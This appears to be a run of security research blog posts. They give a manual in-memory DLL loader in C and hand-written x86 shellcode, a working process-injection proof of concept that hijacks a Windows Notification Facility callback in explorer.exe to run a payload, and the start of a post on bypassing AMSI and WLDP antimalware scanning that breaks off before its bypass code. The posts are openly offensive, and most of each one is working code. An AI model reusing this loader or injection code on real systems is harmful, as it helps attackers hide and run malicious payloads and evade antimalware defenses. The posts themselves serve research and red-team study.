Shellcode: In-Memory Execution of DLL

Introduction

In March 2002, the infamous group 29A published their sixth e-zine. One of the articles titled In-Memory PE EXE Execution by Z0MBiE demonstrated how to manually load and run a Portable Executable entirely from memory. The InMem client provided as a PoC downloads a PE from a remote TFTP server into memory and after some basic preparation executes the entrypoint. Of course, running console and GUI applications from memory isn’t that straightforward because Microsoft Windows consists of subsystems. Try manually executing a console application from inside a GUI subsystem without using NtCreateProcess and it will probably cause an unhandled exception crashing the host process. Unless designed for a specific subsystem, running a DLL from memory is relatively error-free and simple to implement, so this post illustrates just that with C and x86 assembly.

Proof of Concept

Z0MBiE didn’t seem to perform any other research beyond a PoC, however, Y0da did write a tool called InConEx that was published in 29A#7 ca. 2004. Since then, various other implementations have been published, but they all seem to be derived in one form or another from the original PoC and use the following steps.

  1. Allocate RWX memory for size of image. (VirtualAlloc)
  2. Copy each section to RWX memory.
  3. Initialize the import table. (LoadLibrary/GetProcAddress)
  4. Apply relocations.
  5. Execute entry point.

Today, some basic loaders will also handle resources and TLS callbacks. The following is example in C based on Z0MBiE’s article.

typedef struct _IMAGE_RELOC {
    WORD offset :12;
    WORD type   :4;
} IMAGE_RELOC, *PIMAGE_RELOC;

typedef BOOL (WINAPI *DllMain_t)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved);
typedef VOID (WINAPI *entry_exe)(VOID);

VOID load_dllx(LPVOID base);

VOID load_dll(LPVOID base) {
    PIMAGE_DOS_HEADER        dos;
    PIMAGE_NT_HEADERS        nt;
    PIMAGE_SECTION_HEADER    sh;
    PIMAGE_THUNK_DATA        oft, ft;
    PIMAGE_IMPORT_BY_NAME    ibn;
    PIMAGE_IMPORT_DESCRIPTOR imp;
    PIMAGE_RELOC             list;
    PIMAGE_BASE_RELOCATION   ibr;
    DWORD                    rva;
    PBYTE                    ofs;
    PCHAR                    name;
    HMODULE                  dll;
    ULONG_PTR                ptr;
    DllMain_t                DllMain;
    LPVOID                   cs;
    DWORD                    i, cnt;
    
    dos = (PIMAGE_DOS_HEADER)base;
    nt  = RVA2VA(PIMAGE_NT_HEADERS, base, dos->e_lfanew);
    
    // 1. Allocate RWX memory for file
    cs  = VirtualAlloc(
      NULL, nt->OptionalHeader.SizeOfImage, 
      MEM_COMMIT | MEM_RESERVE, 
      PAGE_EXECUTE_READWRITE);
      
    // 2. Copy each section to RWX memory
    sh = IMAGE_FIRST_SECTION(nt);
      
    for(i=0; i<nt->FileHeader.NumberOfSections; i++) {
      memcpy((PBYTE)cs + sh[i].VirtualAddress,
          (PBYTE)base + sh[i].PointerToRawData,
          sh[i].SizeOfRawData);
    }
    
    // 3. Process the Import Table
    rva = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress;
    imp = RVA2VA(PIMAGE_IMPORT_DESCRIPTOR, cs, rva);
      
    // For each DLL
    for (;imp->Name!=0; imp++) {
      name = RVA2VA(PCHAR, cs, imp->Name);
      
      // Load it
      dll = LoadLibrary(name);
      
      // Resolve the API for this library
      oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
        
      // For each API
      for (;; oft++, ft++) {
        // No API left?
        if (oft->u1.AddressOfData == 0) break;
        
        PULONG_PTR func = (PULONG_PTR)&ft->u1.Function;
        
        // Resolve by ordinal?
        if (IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)) {
          *func = (ULONG_PTR)GetProcAddress(dll, (LPCSTR)IMAGE_ORDINAL(oft->u1.Ordinal));
        } else {
          // Resolve by name
          ibn   = RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData);
          *func = (ULONG_PTR)GetProcAddress(dll, ibn->Name);
        }
      }
    }
    
    // 4. Apply Relocations
    rva  = nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress;
    ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, rva);
    ofs  = (PBYTE)cs - nt->OptionalHeader.ImageBase;
    
    while(ibr->VirtualAddress != 0) {
      list = (PIMAGE_RELOC)(ibr + 1);

      while ((PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock) {
        if(list->type == IMAGE_REL_TYPE) {
          *(ULONG_PTR*)((PBYTE)cs + ibr->VirtualAddress + list->offset) += (ULONG_PTR)ofs;
        }
        list++;
      }
      ibr = (PIMAGE_BASE_RELOCATION)list;
    }

    // 5. Execute entrypoint
    DllMain = RVA2VA(DllMain_t, cs, nt->OptionalHeader.AddressOfEntryPoint);
    DllMain(cs, DLL_PROCESS_ATTACH, NULL);
}

x86 assembly

Using the exact same logic except implemented in hand-written assembly … for illustration of course!.

; DLL loader in 306 bytes of x86 assembly (written for fun)
; odzhan

      %include "ds.inc"

      bits   32

      struc _ds
          .VirtualAlloc        resd 1 ; edi
          .LoadLibraryA        resd 1 ; esi
          .GetProcAddress      resd 1 ; ebp
          .AddressOfEntryPoint resd 1 ; esp
          .ImportTable         resd 1 ; ebx
          .BaseRelocationTable resd 1 ; edx
          .ImageBase           resd 1 ; ecx
      endstruc

      %ifndef BIN
        global load_dllx
        global _load_dllx
      %endif
      
load_dllx:
_load_dllx: 
      pop    eax            ; eax = return address
      pop    ebx            ; ebx = base of PE file
      push   eax            ; save return address on stack
      pushad                ; save all registers
      call   init_api       ; load address of api hash onto stack
      dd     0x38194E37     ; VirtualAlloc
      dd     0xFA183D4A     ; LoadLibraryA
      dd     0x4AAC90F7     ; GetProcAddress
init_api:
      pop    esi            ; esi = api hashes
      pushad                ; allocate 32 bytes of memory for _ds
      mov    edi, esp       ; edi = _ds
      push   TEB.ProcessEnvironmentBlock
      pop    ecx
      cdq                   ; eax should be < 0x80000000
get_apis:
      lodsd                 ; eax = hash
      pushad
      mov    eax, [fs:ecx]
      mov    eax, [eax+PEB.Ldr]
      mov    edi, [eax+PEB_LDR_DATA.InLoadOrderModuleList + LIST_ENTRY.Flink]
      jmp    get_dll
next_dll:    
      mov    edi, [edi+LDR_DATA_TABLE_ENTRY.InLoadOrderLinks + LIST_ENTRY.Flink]
get_dll:
      mov    ebx, [edi+LDR_DATA_TABLE_ENTRY.DllBase]
      mov    eax, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      ; ecx = IMAGE_DATA_DIRECTORY.VirtualAddress
      mov    ecx, [ebx+eax+IMAGE_NT_HEADERS.OptionalHeader + \
                           IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                           IMAGE_DIRECTORY_ENTRY_EXPORT * IMAGE_DATA_DIRECTORY_size + \
                           IMAGE_DATA_DIRECTORY.VirtualAddress]
      jecxz  next_dll
      ; esi = offset IMAGE_EXPORT_DIRECTORY.NumberOfNames 
      lea    esi, [ebx+ecx+IMAGE_EXPORT_DIRECTORY.NumberOfNames]
      lodsd
      xchg   eax, ecx
      jecxz  next_dll        ; skip if no names
      ; ebp = IMAGE_EXPORT_DIRECTORY.AddressOfFunctions     
      lodsd
      add    eax, ebx        ; ebp = RVA2VA(eax, ebx)
      xchg   eax, ebp        ;
      ; edx = IMAGE_EXPORT_DIRECTORY.AddressOfNames
      lodsd
      add    eax, ebx        ; edx = RVA2VA(eax, ebx)
      xchg   eax, edx        ;
      ; esi = IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals      
      lodsd
      add    eax, ebx        ; esi = RVA(eax, ebx)
      xchg   eax, esi
get_name:
      pushad
      mov    esi, [edx+ecx*4-4] ; esi = AddressOfNames[ecx-1]
      add    esi, ebx           ; esi = RVA2VA(esi, ebx)
      xor    eax, eax           ; eax = 0
      cdq                       ; h = 0
hash_name:    
      lodsb
      add    edx, eax
      ror    edx, 8
      dec    eax
      jns    hash_name
      cmp    edx, [esp + _eax + pushad_t_size]   ; hashes match?
      popad
      loopne get_name              ; --ecx && edx != hash
      jne    next_dll              ; get next DLL        
      movzx  eax, word [esi+ecx*2] ; eax = AddressOfNameOrdinals[eax]
      add    ebx, [ebp+eax*4]      ; ecx = base + AddressOfFunctions[eax]
      mov    [esp+_eax], ebx
      popad                        ; restore all
      stosd
      inc    edx
      jnp    get_apis              ; until PF = 1
      
      ; dos = (PIMAGE_DOS_HEADER)ebx
      push   ebx
      add    ebx, [ebx+IMAGE_DOS_HEADER.e_lfanew]
      add    ebx, ecx
      ; esi = &nt->OptionalHeader.AddressOfEntryPoint
      lea    esi, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint - 30h]
      movsd          ; [edi+ 0] = AddressOfEntryPoint
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_IMPORT * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 4] = Import Directory Table RVA
      mov    eax, [ebx+IMAGE_NT_HEADERS.OptionalHeader + \
                       IMAGE_OPTIONAL_HEADER32.DataDirectory + \
                       IMAGE_DIRECTORY_ENTRY_BASERELOC * IMAGE_DATA_DIRECTORY_size + \
                       IMAGE_DATA_DIRECTORY.VirtualAddress - 30h]
      stosd          ; [edi+ 8] = Base Relocation Table RVA
      lodsd          ; skip BaseOfCode
      lodsd          ; skip BaseOfData
      movsd          ; [edi+12] = ImageBase
      ; cs  = VirtualAlloc(NULL, nt->OptionalHeader.SizeOfImage, 
      ;          MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
      push   PAGE_EXECUTE_READWRITE
      xchg   cl, ch
      push   ecx
      push   dword[esi + IMAGE_OPTIONAL_HEADER32.SizeOfImage - \
                         IMAGE_OPTIONAL_HEADER32.SectionAlignment]
      push   0                           ; NULL
      call   dword[esp + _ds.VirtualAlloc + 5*4]
      xchg   eax, edi                    ; edi = cs
      pop    esi                         ; esi = base
      
      ; load number of sections
      movzx  ecx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.NumberOfSections - 30h]
      ; edx = IMAGE_FIRST_SECTION()
      movzx  edx, word[ebx + IMAGE_NT_HEADERS.FileHeader + \
                             IMAGE_FILE_HEADER.SizeOfOptionalHeader - 30h]
      lea    edx, [ebx + edx + IMAGE_NT_HEADERS.OptionalHeader - 30h]
map_section:
      pushad
      add    edi, [edx + IMAGE_SECTION_HEADER.VirtualAddress]
      add    esi, [edx + IMAGE_SECTION_HEADER.PointerToRawData]
      mov    ecx, [edx + IMAGE_SECTION_HEADER.SizeOfRawData]
      rep    movsb
      popad
      add    edx, IMAGE_SECTION_HEADER_size
      loop   map_section
      mov    ebp, edi
      ; process the import table
      pushad
      mov    ecx, [esp + _ds.ImportTable + pushad_t_size]
      jecxz  imp_l2
      lea    ebx, [ecx + ebp]
imp_l0:
      ; esi / oft = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->OriginalFirstThunk);
      mov    esi, [ebx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk]
      add    esi, ebp
      ; edi / ft  = RVA2VA(PIMAGE_THUNK_DATA, cs, imp->FirstThunk);
      mov    edi, [ebx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk]
      add    edi, ebp
      mov    ecx, [ebx+IMAGE_IMPORT_DESCRIPTOR.Name]
      add    ebx, IMAGE_IMPORT_DESCRIPTOR_size
      jecxz  imp_l2
      add    ecx, ebp         ; name = RVA2VA(PCHAR, cs, imp->Name);
      ; dll = LoadLibrary(name);
      push   ecx
      call   dword[esp + _ds.LoadLibraryA + 4 + pushad_t_size]  
      xchg   edx, eax         ; edx = dll
imp_l1:
      lodsd                   ; eax = oft->u1.AddressOfData, oft++;
      xchg   eax, ecx
      jecxz  imp_l0           ; if (oft->u1.AddressOfData == 0) break; 
      btr    ecx, 31
      jc     imp_Lx           ; IMAGE_SNAP_BY_ORDINAL(oft->u1.Ordinal)
      ; RVA2VA(PIMAGE_IMPORT_BY_NAME, cs, oft->u1.AddressOfData)
      lea    ecx, [ebp + ecx + IMAGE_IMPORT_BY_NAME.Name]
imp_Lx:
      ; eax = GetProcAddress(dll, ecx);
      push   edx
      push   ecx
      push   edx
      call   dword[esp + _ds.GetProcAddress + 3*4 + pushad_t_size]  
      pop    edx
      stosd                   ; ft->u1.Function = eax
      jmp    imp_l1
imp_l2:
      popad
      ; ibr  = RVA2VA(PIMAGE_BASE_RELOCATION, cs, dir[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress);
      mov    esi, [esp + _ds.BaseRelocationTable]
      add    esi, ebp
      ; ofs  = (PBYTE)cs - opt->ImageBase;
      mov    ebx, ebp
      sub    ebp, [esp + _ds.ImageBase]
reloc_L0:
      ; while (ibr->VirtualAddress != 0) {
      lodsd                  ; eax = ibr->VirtualAddress
      xchg   eax, ecx
      jecxz  call_entrypoint
      lodsd                  ; skip ibr->SizeOfBlock
      lea    edi, [esi + eax - 8]
reloc_L1:
      lodsw                  ; ax = *(WORD*)list;
      and    eax, 0xFFF      ; eax = list->offset
      jz     reloc_L2        ; IMAGE_REL_BASED_ABSOLUTE is used for padding
      add    eax, ecx        ; eax += ibr->VirtualAddress
      add    eax, ebx        ; eax += cs
      add    [eax], ebp      ; *(DWORD*)eax += ofs
      ; ibr = (PIMAGE_BASE_RELOCATION)list;
reloc_L2:
      ; (PBYTE)list != (PBYTE)ibr + ibr->SizeOfBlock
      cmp    esi, edi
      jne    reloc_L1
      jmp    reloc_L0
call_entrypoint:
  %ifndef EXE
      push   ecx                 ; lpvReserved
      push   DLL_PROCESS_ATTACH  ; fdwReason    
      push   ebx                 ; HINSTANCE   
      ; DllMain = RVA2VA(entry_exe, cs, opt->AddressOfEntryPoint);
      add    ebx, [esp + _ds.AddressOfEntryPoint + 3*4]
  %else
      add    ebx, [esp + _ds.AddressOfEntryPoint]
  %endif
      call   ebx
      popad                  ; release _ds
      popad                  ; restore registers
      ret

Running a DLL from memory isn’t difficult if we ignore the export table, resources, TLS and subsystem. The only requirement is that the DLL has a relocation section. The C generated assembly will be used in a new version of Donut while sources in this post can be found here.

Posted in assembly, injection, programming, security, shellcode, windows | Tagged , , , | Leave a comment

Windows Process Injection : Windows Notification Facility

Introduction

At Blackhat 2018, Alex Ionescu and Gabrielle Viala presented Windows Notification Facility: Peeling the Onion of the Most Undocumented Kernel Attack Surface Yet. It’s an exceptional well-researched presentation that I recommend you watch first before reading this post. In it, they describe WNF in great detail; the functions, data structures, how to interact with it. If you don’t wish to watch the whole video, well, you’re missing out on a cool presentation, but you can always read the slides from their talk here. Gabrielle followed up with another well-detailed post called Playing with the Windows Notification Facility (WNF) that is also required reading if you want to understand the internals of WNF. You can find some of their tools here which allow dumping information about state names and subscribing for events. As suggested in the presentation, WNF can be used for code redirection/process injection which is what I’ll describe here. wezmaster has demonstrated how to use WNF for persisting .NET payloads here.

Context Header

The table, user and name subscriptions all have a context header.

typedef struct _WNF_CONTEXT_HEADER {
    CSHORT                   NodeTypeCode;
    CSHORT                   NodeByteSize;
} WNF_CONTEXT_HEADER, *PWNF_CONTEXT_HEADER;

The NodeTypeCode field indicates the type of structure that will appear after the header. The following are some examples.

#define WNF_NODE_SUBSCRIPTION_TABLE  0x911
#define WNF_NODE_NAME_SUBSCRIPTION   0x912
#define WNF_NODE_SERIALIZATION_GROUP 0x913
#define WNF_NODE_USER_SUBSCRIPTION   0x914

For a target process, we scan all writeable areas of memory and attempt to read sizeof(WNF_SUBSCRIPTION_TABLE). For each successful read, the Header.NodeTypeCode is compared with WNF_NODE_SUBSCRIPTION_TABLE while the NodeByteSize is compared with sizeof(WNF_SUBSCRIPTION_TABLE). The type code and byte size are unique to WNF and can be used to locate WNF structures in memory provided no such similar structures exist.

UPDATE: Adam suggested finding the address of WNF table via a function referencing it. You could also search pointers in the .data section or PEB.ProcessHeap. Each of these methods would likely be faster than searching all writeable areas of memory that includes stack memory.

Subscription Table

Created by NTDLL.dll!RtlpInitializeWnf and assigned type 0x911. Both NTDLL.dll!RtlRegisterForWnfMetaNotification and NTDLL.dll!RtlSubscribeWnfStateChangeNotification will create the table if one doesn’t already exist. You could hijack the callback function in TP_TIMER to redirect code, but since this post is about WNF, we need to look at the other structures.

typedef struct _WNF_SUBSCRIPTION_TABLE {
    WNF_CONTEXT_HEADER                Header;
    SRWLOCK                           NamesTableLock;
    LIST_ENTRY                        NamesTableEntry;
    LIST_ENTRY                        SerializationGroupListHead;
    SRWLOCK                           SerializationGroupLock;
    DWORD                             Unknown1[2];
    DWORD                             SubscribedEventSet;
    DWORD                             Unknown2[2];
    PTP_TIMER                         Timer;
    ULONG64                           TimerDueTime;
} WNF_SUBSCRIPTION_TABLE, *PWNF_SUBSCRIPTION_TABLE;

The main field we’re interested in is the NamesTableEntry that will point to a list of WNF_NAME_SUBSCRIPTION structures.

Serialization Group

Created by NTDLL.dll!RtlpCreateSerializationGroup and assigned type 0x913. Although not important for process injection, It’s here for reference since it wasn’t described in the presentation.

typedef struct _WNF_SERIALIZATION_GROUP {
    WNF_CONTEXT_HEADER                Header;
    ULONG                             GroupId;
    LIST_ENTRY                        SerializationGroupList;
    ULONG64                           SerializationGroupValue;
    ULONG64                           SerializationGroupMemberCount;
} WNF_SERIALIZATION_GROUP, *PWNF_SERIALIZATION_GROUP;

Name Subscription

Created by NTDLL.dll!RtlpCreateWnfNameSubscription and assigned type 0x912. When subscribing for notifications, an attempt will be made to locate an existing name subscription and simply insert a user subscription into the SubscriptionsList using NTDLL.dll!RtlpAddWnfUserSubToNameSub.

typedef struct _WNF_NAME_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    ULONG64                           SubscriptionId;
    WNF_STATE_NAME_INTERNAL           StateName;
    WNF_CHANGE_STAMP                  CurrentChangeStamp;
    LIST_ENTRY                        NamesTableEntry;
    PWNF_TYPE_ID                      TypeId;
    SRWLOCK                           SubscriptionLock;
    LIST_ENTRY                        SubscriptionsListHead;
    ULONG                             NormalDeliverySubscriptions;
    ULONG                             NotificationTypeCount[5];
    PWNF_DELIVERY_DESCRIPTOR          RetryDescriptor;
    ULONG                             DeliveryState;
    ULONG64                           ReliableRetryTime;
} WNF_NAME_SUBSCRIPTION, *PWNF_NAME_SUBSCRIPTION;

The main fields we’re interested in are NamesTableEntry and SubscriptionsListHead for each user subscription that is described next.

User Subscription

Created by NTDLL.dll!RtlpCreateWnfUserSubscription and assigned type 0x914. This is the main structure one would want to modify for process injection or code redirection.

typedef struct _WNF_USER_SUBSCRIPTION {
    WNF_CONTEXT_HEADER                Header;
    LIST_ENTRY                        SubscriptionsListEntry;
    PWNF_NAME_SUBSCRIPTION            NameSubscription;
    PWNF_USER_CALLBACK                Callback;
    PVOID                             CallbackContext;
    ULONG64                           SubProcessTag;
    ULONG                             CurrentChangeStamp;
    ULONG                             DeliveryOptions;
    ULONG                             SubscribedEventSet;
    PWNF_SERIALIZATION_GROUP          SerializationGroup;
    ULONG                             UserSubscriptionCount;
    ULONG64                           Unknown[10];
} WNF_USER_SUBSCRIPTION, *PWNF_USER_SUBSCRIPTION;

We’re interested in the Callback and CallbackContext fields. If the context pointed to a virtual function table and one of the methods was executed upon receiving a notification from the kernel, then it probably wouldn’t require modifying Callback at all. To make things easier, the PoC only modifies the Callback value.

Callback Prototype

Six parameters are passed to a callback procedure. Both Buffer and CallbackContext could be utilized to pass in arbitrary code or commands, but since the PoC only executes notepad.exe, the parameters are ignored. That being said, it’s still important to use the same prototype for a payload so that the parameters are safely removed from the stack before returning to the caller.

typedef NTSTATUS (*PWNF_USER_CALLBACK) (
    _In_     WNF_STATE_NAME   StateName,
    _In_     WNF_CHANGE_STAMP ChangeStamp,
    _In_opt_ PWNF_TYPE_ID     TypeId,
    _In_opt_ PVOID            CallbackContext,
    _In_     PVOID            Buffer,
    _In_     ULONG            BufferSize);

Listing Subscriptions

To help locate the WNF subscription table in a remote process, I wrote a simple tool called wnfscan that searches all writeable areas of memory for the context header. Once found, it parses and displays a list of name and user subscriptions.

Process Injection

Because we have to locate the WNF subscription table by scanning memory, this method of injection is more complicated than others. We don’t search for WNF_USER_SUBSCRIPTION structures because they appear higher up in memory and take too long to find. Scanning for the table first is much faster since it’s usually created when the process starts thus appearing lower in memory. Once the table is found, the name subscriptions are read and a user subscription is returned.

VOID wnf_inject(LPVOID payload, DWORD payloadSize) {
    WNF_USER_SUBSCRIPTION  us;
    LPVOID                 sa, cs;
    HWND                   hw;
    HANDLE                 hp;
    DWORD                  pid;
    SIZE_T                 wr;
    ULONG64                ns = WNF_SHEL_APPLICATION_STARTED;
    NtUpdateWnfStateData_t _NtUpdateWnfStateData;
    HMODULE                m;
      
    // 1. Open explorer.exe
    hw = FindWindow(L"Shell_TrayWnd", NULL);
    GetWindowThreadProcessId(hw, &pid);
    hp = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
    
    // 2. Locate user subscription
    sa = GetUserSubFromProcess(hp, &us, WNF_SHEL_APPLICATION_STARTED);

    // 3. Allocate RWX memory and write payload
    cs = VirtualAllocEx(hp, NULL, payloadSize,
        MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
    WriteProcessMemory(hp, cs, payload, payloadSize, &wr);
    
    // 4. Update callback and trigger execution of payload
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &cs,
      sizeof(ULONG_PTR),
      &wr);
      
    m = GetModuleHandle(L"ntdll");
    _NtUpdateWnfStateData = 
      (NtUpdateWnfStateData_t)GetProcAddress(m, "NtUpdateWnfStateData");
      
    _NtUpdateWnfStateData(
      &ns, NULL, 0, 0, NULL, 0, 0);
      
    // 5. Restore original callback, free memory and close process
    WriteProcessMemory(
      hp, 
      (PBYTE)sa + offsetof(WNF_USER_SUBSCRIPTION, Callback), 
      &us.Callback,
      sizeof(ULONG_PTR),
      &wr);
    VirtualFreeEx(hp, cs, 0, MEM_DECOMMIT | MEM_RELEASE);
    CloseHandle(hp);
}

Summary

Since it’s possible to transfer data into the address space of a remote process via WNF publishing, it may be possible to avoid using VirtualAllocEx and WriteProcessMemory. Some .NET processes allocate executable memory with write permissions that could be misused by an external process for code injection. A PoC that executes notepad can be found here.

Posted in assembly, injection, malware, programming, windows | Tagged , , | 1 Comment

How Red Teams Bypass AMSI and WLDP for .NET Dynamic Code

  1. Introduction
  2. Previous Research
  3. AMSI Example in C
  4. AMSI Context
  5. AMSI Initialization
  6. AMSI Scanning
  7. CLR Implementation of AMSI
  8. AMSI Bypass A (Patching Data)
  9. AMSI Bypass B (Patching Code 1)
  10. AMSI Bypass C (Patching Code 2)
  11. WLDP Example in C
  12. WLDP Bypass A (Patching Code 1)

1. Introduction

v4.8 of the dotnet framework uses Antimalware Scan Interface (AMSI) and Windows Lockdown Policy (WLDP) to block potentially unwanted software running from memory. WLDP will verify the digital signature of dynamic code while AMSI will scan for software that is either harmful or blocked by the administrator. This post documents three publicly-known methods red teams currently use to bypass AMSI and one to bypass WLDP. The bypass methods described are somewhat generic and don’t require any special knowledge. If you’re reading this post anytime after June 2019, the methods may no longer work. The research shown here was conducted in collaboration with TheWover.

2. Previous Research

The following table includes links to past research. If you feel I’ve missed anyone, don’t hesitate to e-mail me the details.

Date Article
May 2016 Bypassing Amsi using PowerShell 5 DLL Hijacking by Cneelis
Jul 2017 Bypassing AMSI via COM Server Hijacking by Matt Nelson
Jul 2017 Bypassing Device Guard with .NET Assembly Compilation Methods by Matt Graeber
Feb 2018 AMSI Bypass With a Null Character by Satoshi Tanda
Feb 2018 AMSI Bypass: Patching Technique by CyberArk (Avi Gimpel and Zeev Ben Porat).
Feb 2018 The Rise and Fall of AMSI by Tal Liberman (Ensilo).
May 2018 AMSI Bypass Redux by Avi Gimpel (CyberArk).
Jun 2018 Exploring PowerShell AMSI and Logging Evasion by Adam Chester
Jun 2018 Disabling AMSI in JScript with One Simple Trick by James Forshaw
Jun 2018 Documenting and Attacking a Windows Defender Application Control Feature the Hard Way – A Case Study in Security Research Methodology by Matt Graeber
Oct 2018 How to bypass AMSI and execute ANY malicious Powershell code by Andre Marques
Oct 2018 AmsiScanBuffer Bypass Part 1, Part 2, Part 3, Part 4 by Rasta Mouse
Dec 2018 PoC function to corrupt the g_amsiContext global variable in clr.dll by Matt Graeber
Apr 2019 Bypassing AMSI for VBA by Pieter Ceelen (Outflank)
Apr 2019 Sneaking Past Device Guard by Philip Tsukerman (Cybereason)

3. AMSI Example in C

Given the path to a file, the following function will open it, map into memory and use AMSI to detect if the contents are harmful or blocked by the administrator.

typedef HRESULT (WINAPI *AmsiInitialize_t)(
  LPCWSTR      appName,
  HAMSICONTEXT *amsiContext);

typedef HRESULT (WINAPI *AmsiScanBuffer_t)(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result);

typedef void (WINAPI *AmsiUninitialize_t)(
  HAMSICONTEXT amsiContext);
  
BOOL IsMalware(const char *path) {
    AmsiInitialize_t   _AmsiInitialize;
    AmsiScanBuffer_t   _AmsiScanBuffer;
    AmsiUninitialize_t _AmsiUninitialize;
    HAMSICONTEXT       ctx;
    AMSI_RESULT        res;
    HMODULE            amsi;
    
    HANDLE             file, map, mem;
    HRESULT            hr = -1;
    DWORD              size, high;
    BOOL               malware = FALSE;
    
    // load amsi library
    amsi = LoadLibrary("amsi");
    
    // resolve functions
    _AmsiInitialize = 
      (AmsiInitialize_t)
      GetProcAddress(amsi, "AmsiInitialize");
    
    _AmsiScanBuffer =
      (AmsiScanBuffer_t)
      GetProcAddress(amsi, "AmsiScanBuffer");
      
    _AmsiUninitialize = 
      (AmsiUninitialize_t)
      GetProcAddress(amsi, "AmsiUninitialize");
      
    // return FALSE on failure
    if(_AmsiInitialize   == NULL ||
       _AmsiScanBuffer   == NULL ||
       _AmsiUninitialize == NULL) {
      printf("Unable to resolve AMSI functions.\n");
      return FALSE;
    }
    
    // open file for reading
    file = CreateFile(
      path, GENERIC_READ, FILE_SHARE_READ,
      NULL, OPEN_EXISTING, 
      FILE_ATTRIBUTE_NORMAL, NULL); 
    
    if(file != INVALID_HANDLE_VALUE) {
      // get size
      size = GetFileSize(file, &high);
      if(size != 0) {
        // create mapping
        map = CreateFileMapping(
          file, NULL, PAGE_READONLY, 0, 0, 0);
          
        if(map != NULL) {
          // get pointer to memory
          mem = MapViewOfFile(
            map, FILE_MAP_READ, 0, 0, 0);
            
          if(mem != NULL) {
            // scan for malware
            hr = _AmsiInitialize(L"AMSI Example", &ctx);
            if(hr == S_OK) {
              hr = _AmsiScanBuffer(ctx, mem, size, NULL, 0, &res);
              if(hr == S_OK) {
                malware = (AmsiResultIsMalware(res) || 
                           AmsiResultIsBlockedByAdmin(res));
              }
              _AmsiUninitialize(ctx);
            }              
            UnmapViewOfFile(mem);
          }
          CloseHandle(map);
        }
      }
      CloseHandle(file);
    }
    return malware;
}

Scanning a good and bad file.

If you’re already familiar with the internals of AMSI, you can skip to the bypass methods here.

4. AMSI Context

The context is an undocumented structure, but you may use the following to interpret the handle returned.

typedef struct tagHAMSICONTEXT {
  DWORD        Signature;          // "AMSI" or 0x49534D41
  PWCHAR       AppName;            // set by AmsiInitialize
  IAntimalware *Antimalware;       // set by AmsiInitialize
  DWORD        SessionCount;       // increased by AmsiOpenSession
} _HAMSICONTEXT, *_PHAMSICONTEXT;

5. AMSI Initialization

appName points to a user-defined string in unicode format while amsiContext points to a handle of type HAMSICONTEXT. It returns S_OK if an AMSI context was successfully initialized. The following code is not a full implementation of the function, but should help you understand what happens internally.

HRESULT _AmsiInitialize(LPCWSTR appName, HAMSICONTEXT *amsiContext) {
    _HAMSICONTEXT *ctx;
    HRESULT       hr;
    int           nameLen;
    IClassFactory *clsFactory = NULL;
    
    // invalid arguments?
    if(appName == NULL || amsiContext == NULL) {
      return E_INVALIDARG;
    }
    
    // allocate memory for context
    ctx = (_HAMSICONTEXT*)CoTaskMemAlloc(sizeof(_HAMSICONTEXT));
    if(ctx == NULL) {
      return E_OUTOFMEMORY;
    }
    
    // initialize to zero
    ZeroMemory(ctx, sizeof(_HAMSICONTEXT));
    
    // set the signature to "AMSI"
    ctx->Signature = 0x49534D41;
    
    // allocate memory for the appName and copy to buffer
    nameLen = (lstrlen(appName) + 1) * sizeof(WCHAR);
    ctx->AppName = (PWCHAR)CoTaskMemAlloc(nameLen);
    
    if(ctx->AppName == NULL) {
      hr = E_OUTOFMEMORY;
    } else {
      // set the app name
      lstrcpy(ctx->AppName, appName);
      
      // instantiate class factory
      hr = DllGetClassObject(
        CLSID_Antimalware, 
        IID_IClassFactory, 
        (LPVOID*)&clsFactory);
        
      if(hr == S_OK) {
        // instantiate Antimalware interface
        hr = clsFactory->CreateInstance(
          NULL,
          IID_IAntimalware, 
          (LPVOID*)&ctx->Antimalware);
        
        // free class factory
        clsFactory->Release();
        
        // save pointer to context
        *amsiContext = ctx;
      }
    }
    
    // if anything failed, free context
    if(hr != S_OK) {
      AmsiFreeContext(ctx);
    }
    return hr;
}

Memory is allocated on the heap for a HAMSICONTEXT structure and initialized using the appName, the AMSI signature (0x49534D41) and IAntimalware interface.

6. AMSI Scanning

The following code gives you a rough idea of what happens when the function is invoked. If the scan is successful, the result returned will be S_OK and the AMSI_RESULT should be inspected to determine if the buffer contains unwanted software.

HRESULT _AmsiScanBuffer(
  HAMSICONTEXT amsiContext,
  PVOID        buffer,
  ULONG        length,
  LPCWSTR      contentName,
  HAMSISESSION amsiSession,
  AMSI_RESULT  *result)
{
